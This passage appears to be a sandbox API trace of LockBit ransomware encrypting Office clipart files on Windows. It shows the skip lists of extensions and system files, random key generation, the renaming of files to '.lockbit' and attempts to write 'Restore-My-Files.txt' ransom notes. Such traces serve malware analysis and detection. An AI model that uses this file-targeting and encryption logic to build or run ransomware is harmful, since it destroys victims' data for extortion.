cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.989] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.395] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0178.395] malloc (_Size=0xa6) returned 0x1fa2ed8 [0178.395] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0178.397] free (_Block=0x1fa2ed8) [0178.397] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0178.397] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0178.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0178.397] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x243c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00018_.WMF", cAlternateFileName="")) returned 1 [0178.397] lstrcmpiW (lpString1=".", lpString2="TN00018_.WMF") returned -1 [0178.397] lstrcmpiW (lpString1="..", lpString2="TN00018_.WMF") returned -1 [0178.397] PathFindExtensionW (pszPath="TN00018_.WMF") returned=".WMF" [0178.398] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0178.398] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0178.399] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0178.399] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="ntldr", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00018_.WMF") returned -1 [0178.400] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00018_.WMF") returned -1 [0178.400] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0178.400] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF") returned=".WMF" [0178.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0178.400] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0178.400] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0178.401] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0178.401] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF.lockbit") returned 72 [0178.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00018_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0178.402] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0178.403] malloc (_Size=0x40068) returned 0x3df0008 [0178.403] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9276) returned 1 [0178.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0178.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0178.404] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0178.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0178.485] malloc (_Size=0xa6) returned 0x1fa2ed8 [0178.486] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0178.487] free (_Block=0x1fa2ed8) [0178.487] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0178.487] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0178.487] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0178.488] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x175a, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00095_.WMF", cAlternateFileName="")) returned 1 [0178.488] lstrcmpiW (lpString1=".", lpString2="TN00095_.WMF") returned -1 [0178.488] lstrcmpiW (lpString1="..", lpString2="TN00095_.WMF") returned -1 [0178.488] PathFindExtensionW (pszPath="TN00095_.WMF") returned=".WMF" [0178.488] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0178.488] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0178.488] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0178.488] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0178.488] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0178.488] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0178.495] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0178.496] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0178.496] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="ntldr", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00095_.WMF") returned -1 [0178.497] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00095_.WMF") returned -1 [0178.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0178.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF") returned=".WMF" [0178.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0178.497] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0178.497] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0178.498] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0178.498] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF.lockbit") returned 72 [0178.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00095_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0178.501] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0178.501] malloc (_Size=0x40068) returned 0x1ff1e60 [0178.501] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5978) returned 1 [0178.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0178.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0178.502] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0178.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0178.533] malloc (_Size=0xa6) returned 0x1fa2ed8 [0178.533] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0178.534] free (_Block=0x1fa2ed8) [0178.534] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0178.534] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0178.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0178.534] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c9af00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x53c9af00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00211_.WMF", cAlternateFileName="")) returned 1 [0178.534] lstrcmpiW (lpString1=".", lpString2="TN00211_.WMF") returned -1 [0178.534] lstrcmpiW (lpString1="..", lpString2="TN00211_.WMF") returned -1 [0178.534] PathFindExtensionW (pszPath="TN00211_.WMF") returned=".WMF" [0178.534] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0178.534] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0178.534] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0178.534] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0178.535] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0178.535] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00211_.WMF") returned -1 